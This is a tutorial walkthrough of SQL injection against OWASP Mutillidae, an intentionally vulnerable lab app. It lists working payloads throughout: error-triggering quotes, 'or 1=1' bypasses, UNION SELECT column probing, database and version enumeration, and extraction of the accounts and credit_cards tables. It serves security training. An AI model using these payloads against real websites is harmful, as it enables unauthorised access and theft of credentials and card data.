SQL Injection in Mutillidae
What is SQL Injection?
SQL injection is a form of web security flaw that allows an attacker to interfere with a web application’s database queries. It helps an attacker to see data that they wouldn’t usually be able to see. This may include data belonging to other users or any other information that the app has access to. Basically, SQL injection is the placement of malicious code in SQL statements, via web page input. It is one of the OWASP Top 10 Web Application Security Risks.
What is Mutillidae?
Mutillidae is software by OWASP. It is a free, open source web application that allows security enthusiasts to pen-test and hack websites. Mutillidae can be installed using XAMMP on Linux, Windows XP, and Windows 7, making it simple for users who do not want to set up or manage their own webserver.
Starting with Mutillidae SQL Injection.
Here, We won’t be able to cover everything there is to know about SQL injection because it is such a broad subject, but we will go through some of the basics. For demonstration purposes, we will use metasploitable’s Mutillidae web application, which is vulnerable to SQL Injection attacks.
Click on “Mutillidae” link.
Now, Go to OWASP 2017> A1 Injection(SQL) > SQLi- Extract data>User Info(SQL).
Here, Now Enter name an apostrophe ( ‘ ).
Click on View Account Details. This will cause an error and give you an output looking like this:
- Here, we can see information about database which application supports.We can see the entire path of the file which is handling this error from file.
- From message we can see that this is a MYSQL database.
- The SQL query that is used is clearly visible in the error table. To access info, the query requires both a username and a password.
- However, since we don’t have a username or password, we can make the statement Valid without them by using comments ( — ) and the SQL operator “OR.” We need query to execute like SELECT * FROM accounts WHERE username= ‘ OR 1=1 — password=’’.
Therefore, we will enter second query to try is → ‘ or 1=1- —
Click on view Account Details and we can see the results that we got entire table which includes admin username/password also.
To search or admin only enter → admin’#
Union-based SQL injection
The UNION keyword can be used to extract data from other tables within the database when an application is vulnerable to SQL injection and the results of the query are returned within the application’s responses. An SQL injection UNION attack is the outcome of this.
When performing an SQL injection UNION attack, there are two effective ways to determine how many columns are being returned from the original query.
Method 1: Injecting a set of ORDER BY clauses and incrementing the specified column index until there is an error.
Method 2: Sending a sequence of UNION SELECT payloads with varying numbers of null values
Now, Enter Query as : 1. ‘ union select null — -. Remember to put a space after the “— “. Click on View Account Details and it will give you output as below:
- Here, we can see that error which shows that query did not use the correct number of columns to line up with the account database table.
Now, Enter in name field → ‘ union select null— -. It will give same error. We have to try until we get some output.
Finally, we got the output using →‘ union select null,null,null,null,null,null,null — -.
This does not seem to be much at first glance. However, outside of the application’s original purpose, we discovered a possible way to retrieve data from the database.
Enter this query to retrieve information about database.
Query: ‘ union select null,database(),null,null,null,null,null —
Query to gather information about version:
Query: ‘ union select null,@@version,null,null,null,null,null –
Query to know who is current user.
Query: ‘ union select null,user(),null,null,null,null,null –
Query: ‘union select 1,2,3,4,5,6,7 –
The purpose of this union statement is to map out which fields in the database correspond to the above numbers.
Query: ‘ union select null,cid,username,is_admin,null,null,null from accounts –-
We were able to recover all of the database’s usernames and passwords.
Query: ‘ union select null,table_name,column_name,null,null,null,null from information_schema.columns —
Query: ‘ union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards —- (space after — -)
Yeayyy, We successfully exploited a bug in the user-info.php script to view credit card information through an accounts table query.
Query Through URL
We can enter SQL queries also through URL. For that we will enter query into field of username and password.
Example:
Now, click on Enter and output is here:
CONCLUSION:
Hence, SQL Injection is one of the most common and perilous attacks that website’s software experience. This attack can be performed on SQL databases to modify and misconfigure it. This is how we can use SQL to gain information.